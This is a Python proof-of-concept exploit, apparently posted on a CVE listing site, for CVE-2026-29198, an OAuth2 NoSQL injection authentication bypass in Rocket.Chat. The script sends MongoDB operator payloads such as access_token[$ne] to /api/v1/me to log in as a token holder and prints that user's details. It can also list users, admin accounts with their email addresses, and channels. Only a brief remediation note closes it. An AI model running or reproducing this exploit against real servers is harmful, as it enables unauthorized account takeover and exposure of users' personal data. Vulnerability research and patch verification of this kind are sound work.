5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_cve_2026_29198.py PY
#!/usr/bin/env python3
"""
** PoC By HMs **

CVE-2026-29198 - Rocket.Chat OAuth2 NoSQL Injection -> Auth Bypass
Usage:
    python3 poc_cve_2026_29198.py --url http://localhost:3000
    python3 poc_cve_2026_29198.py --url http://target --escalate -v
    python3 poc_cve_2026_29198.py --url http://target --proxy http://127.0.0.1:8080
"""
import requests
import argparse
import json
import sys
import time
from urllib.parse import urlencode

try:
    requests.packages.urllib3.disable_warnings()
except ImportError:
    print("[!] requests not installed: pip install requests")
    sys.exit(1)

# ── ANSI colours ──────────────────────────────────────────────────────────────
R = "\033[91m"; G = "\033[92m"; Y = "\033[93m"; B = "\033[94m"; W = "\033[0m"

def ok(msg):  print(f"{G}[+]{W} {msg}")
def err(msg): print(f"{R}[-]{W} {msg}")
def inf(msg): print(f"{B}[*]{W} {msg}")
def wrn(msg): print(f"{Y}[!]{W} {msg}")

# ── NoSQL injection payloads ──────────────────────────────────────────────────
PAYLOADS = [
    ("$ne null",      {"access_token[$ne]": "null"}),
    ("$ne empty",     {"access_token[$ne]": ""}),
    ("$exists true",  {"access_token[$exists]": "true"}),
    ("$gt empty",     {"access_token[$gt]": ""}),
    ("$regex any",    {"access_token[$regex]": "."}),
    ("$regex hex40",  {"access_token[$regex]": "^[0-9a-f]{40}$"}),
]

# ── HTTP helper ───────────────────────────────────────────────────────────────
def get(session, url, params=None, verbose=False):
    try:
        r = session.get(url, params=params, timeout=10, verify=False)
        if verbose:
            inf(f"GET {r.url}  ->  HTTP {r.status_code}")
        return r
    except requests.exceptions.ConnectionError:
        err(f"Connection refused: {url}")
        return None
    except requests.exceptions.Timeout:
        err(f"Timeout: {url}")
        return None

# ── Step 1: probe for vulnerability ──────────────────────────────────────────
def probe(session, base, verbose):
    inf("Step 1 — probing for NoSQL injection vulnerability")
    endpoint = f"{base}/api/v1/me"

    # Baseline: unauthenticated request should return 401
    r = get(session, endpoint, verbose=verbose)
    if r is None:
        return None, None
    if r.status_code not in (401, 403, 200):
        wrn(f"Unexpected baseline status {r.status_code} — continuing anyway")

    for label, params in PAYLOADS:
        r = get(session, endpoint, params=params, verbose=verbose)
        if r is None:
            continue
        if r.status_code == 200:
            try:
                data = r.json()
            except ValueError:
                continue
            if data.get("success") and data.get("_id"):
                ok(f"Payload '{label}' succeeded!")
                return params, data
        if verbose:
            inf(f"  Payload '{label}' -> {r.status_code}")

    return None, None

# ── Step 2: dump victim user info ─────────────────────────────────────────────
def dump_user(data):
    inf("Step 2 — leaked user info")
    fields = ["_id", "username", "name", "emails", "roles", "status", "active"]
    for f in fields:
        val = data.get(f)
        if val is not None:
            ok(f"  {f}: {val}")

# ── Step 3: escalate — list users, find admins ────────────────────────────────
def escalate(session, base, winning_params, verbose):
    inf("Step 3 — escalating: listing users via /api/v1/users.list")
    r = get(session, f"{base}/api/v1/users.list",
            params={**winning_params, "count": "50"}, verbose=verbose)
    if r is None or r.status_code != 200:
        err(f"users.list failed (HTTP {r.status_code if r else 'N/A'})")
        err("  Likely requires admin role — victim token may not be admin")
        return

    try:
        data = r.json()
    except ValueError:
        err("Non-JSON response from users.list")
        return

    users = data.get("users", [])
    ok(f"users.list returned {len(users)} users")
    admins = [u for u in users if "admin" in u.get("roles", [])]
    if admins:
        ok(f"Found {len(admins)} admin account(s):")
        for a in admins:
            ok(f"  _id={a.get('_id')}  username={a.get('username')}  email={a.get('emails', [{}])[0].get('address', 'N/A')}")
    else:
        wrn("No admin accounts in first 50 users (may need pagination)")

    inf("Step 3b — trying /api/v1/channels.list (admin-only)")
    r2 = get(session, f"{base}/api/v1/channels.list",
             params={**winning_params, "count": "10"}, verbose=verbose)
    if r2 and r2.status_code == 200:
        try:
            ch = r2.json().get("channels", [])
            ok(f"channels.list returned {len(ch)} channels")
            for c in ch[:5]:
                ok(f"  #{c.get('name')}  (msgs: {c.get('msgs')})")
        except ValueError:
            pass
    else:
        wrn(f"channels.list -> {r2.status_code if r2 else 'N/A'}")

# ── Step 4: check if patched ──────────────────────────────────────────────────
def check_patched(session, base, verbose):
    inf("Patch check — sending string token to confirm baseline rejection")
    r = get(session, f"{base}/api/v1/me",
            params={"access_token": "INVALID_TOKEN_STRING"}, verbose=verbose)
    if r and r.status_code == 401:
        ok("String token correctly rejected (expected behaviour)")
    elif r and r.status_code == 200:
        wrn("String token accepted?! Check if this is a valid token collision")


# ── Main ──────────────────────────────────────────────────────────────────────
def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-29198 PoC — Rocket.Chat OAuth2 NoSQL Injection")
    parser.add_argument("--url",      required=True, help="Base URL, e.g. http://localhost:3000")
    parser.add_argument("--escalate", action="store_true", help="Attempt privilege escalation after bypass")
    parser.add_argument("--proxy",    help="HTTP proxy, e.g. http://127.0.0.1:8080")
    parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
    args = parser.parse_args()

    base = args.url.rstrip("/")

    print(f"""
{R}╔══════════════════════════════════════════════════════════╗
║  CVE-2026-29198  Rocket.Chat OAuth2 NoSQL Injection PoC  ║
║                     **PoC by HMs**                       ║
╚══════════════════════════════════════════════════════════╝{W}
Target : {base}
""")

    session = requests.Session()
    session.headers.update({"User-Agent": "Mozilla/5.0 (PoC CVE-2026-29198)"})
    if args.proxy:
        session.proxies = {"http": args.proxy, "https": args.proxy}
        inf(f"Proxy: {args.proxy}")

    # Connectivity check — /api/v1/info may return 403 on older versions, try fallback
    reachable = False
    for probe_url in [f"{base}/api/v1/info", f"{base}/api/v1/me", f"{base}/"]:
        r = get(session, probe_url, verbose=args.verbose)
        if r is not None:
            reachable = True
            if probe_url.endswith("/info") and r.status_code == 200:
                try:
                    ver = r.json().get("info", {}).get("version", "unknown")
                    ok(f"Server reachable — Rocket.Chat version: {ver}")
                except ValueError:
                    ok("Server reachable")
            else:
                ok(f"Server reachable (HTTP {r.status_code} on {probe_url})")
            break
    if not reachable:
        err("Cannot reach target. Exiting.")
        sys.exit(1)

    check_patched(session, base, args.verbose)
    print()

    winning_params, user_data = probe(session, base, args.verbose)

    if winning_params is None:
        err("All payloads failed — two possible reasons:")
        err("  1. Target is PATCHED (PR #39492 applied)")
        err("  2. No active OAuth tokens in DB (no user has done OAuth2 flow yet)")
        sys.exit(1)

    print()
    dump_user(user_data)

    if args.escalate:
        print()
        escalate(session, base, winning_params, args.verbose)

    print(f"""
{G}[SUMMARY]{W}
  Status   : VULNERABLE
  Payload  : {winning_params}
  Victim   : {user_data.get('username')} (id={user_data.get('_id')})
  Roles    : {user_data.get('roles')}
  Impact   : Unauthenticated access as any user with an active OAuth token

{Y}[REMEDIATION]{W}
  Apply patch from PR #39492 or upgrade to a fixed version.
  Ensure typeof check on access_token query param before use.
""")

if __name__ == "__main__":
    main()